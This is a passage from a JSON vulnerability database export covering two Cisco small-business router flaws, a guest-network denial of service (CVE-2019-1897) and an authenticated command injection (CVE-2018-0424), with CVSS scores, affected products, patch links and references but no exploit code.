"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0688",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "BID",
"id": "108848"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines of Tenable, Inc. .",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
}
],
"trust": 0.6
},
"cve": "CVE-2019-1897",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2019-1897",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-18900",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-151369",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1897",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1897",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-1897",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2019-1897",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-1897",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-18900",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-794",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-151369",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "VULHUB",
"id": "VHN-151369"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to disconnect clients that are connected to the guest network on an affected router. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for device disconnection and providing the connected device information. A successful exploit could allow the attacker to deny service to specific clients that are connected to the guest network. Cisco RV110W , RV130W , RV215W There is an authorization vulnerability in the router.Service operation interruption (DoS) There is a possibility of being put into a state. The Cisco\\302\\256 RV110W and so on are all VPN firewall routers from Cisco. The vulnerability stems from a program failing to properly authorize an HTTP request, which can be exploited by a remote attacker to cause a denial of service. \nAn attacker can leverage this issue to cause denial of service condition. \nThis issue is being tracked by Cisco Bug IDs CSCvo65045, CSCvo65048, CSCvo65050",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-1897"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "BID",
"id": "108848"
},
{
"db": "VULHUB",
"id": "VHN-151369"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-1897",
"trust": 3.4
},
{
"db": "BID",
"id": "108848",
"trust": 2.0
},
{
"db": "TENABLE",
"id": "TRA-2019-29",
"trust": 1.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.2190",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-18900",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-151369",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "VULHUB",
"id": "VHN-151369"
},
{
"db": "BID",
"id": "108848"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"id": "VAR-201906-0688",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "VULHUB",
"id": "VHN-151369"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
}
]
},
"last_update_date": "2024-11-23T22:06:10.343000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20190619-rv-dos",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-dos"
},
{
"title": "Patch for Cisco RV110W, RV130W, and RV215W Licensing Issue Vulnerabilities (CNVD-2019-18900)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/164677"
},
{
"title": "Cisco RV110W , RV130W and RV215W Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93944"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-285",
"trust": 1.9
},
{
"problemtype": "CWE-306",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151369"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/108848"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/research/tra-2019-29"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1897"
},
{
"trust": 1.2,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
},
{
"trust": 0.9,
"url": "http://www.cisco.com/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1897"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "VULHUB",
"id": "VHN-151369"
},
{
"db": "BID",
"id": "108848"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"db": "VULHUB",
"id": "VHN-151369"
},
{
"db": "BID",
"id": "108848"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"date": "2019-06-20T00:00:00",
"db": "VULHUB",
"id": "VHN-151369"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108848"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"date": "2019-06-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"date": "2019-06-20T03:15:12.353000",
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18900"
},
{
"date": "2020-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-151369"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108848"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005706"
},
{
"date": "2020-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-794"
},
{
"date": "2024-11-21T04:37:38.470000",
"db": "NVD",
"id": "CVE-2019-1897"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Vulnerabilities related to authorization in routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005706"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-794"
}
],
"trust": 0.6
}
}
var-201810-0302
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input to scripts by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the root user. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router. The vulnerability stems from a failure to validate data entered by the user
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0302",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.44"
},
{
"model": "rv215w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.0.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
}
]
},
"cve": "CVE-2018-0424",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2018-0424",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-18073",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-118626",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-0424",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-0424",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-0424",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-0424",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-18073",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-263",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-118626",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input to scripts by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the root user. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router. The vulnerability stems from a failure to validate data entered by the user",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-0424"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-0424",
"trust": 3.1
},
{
"db": "SECTRACK",
"id": "1041677",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-18073",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-118626",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"id": "VAR-201810-0302",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
}
]
},
"last_update_date": "2024-11-23T23:08:34.523000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20180905-rv-routers-injection",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-injection"
},
{
"title": "CiscoRV110W, RV130W, RV215W Command Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/139761"
},
{
"title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84594"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.9
},
{
"problemtype": "CWE-78",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-118626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "NVD",
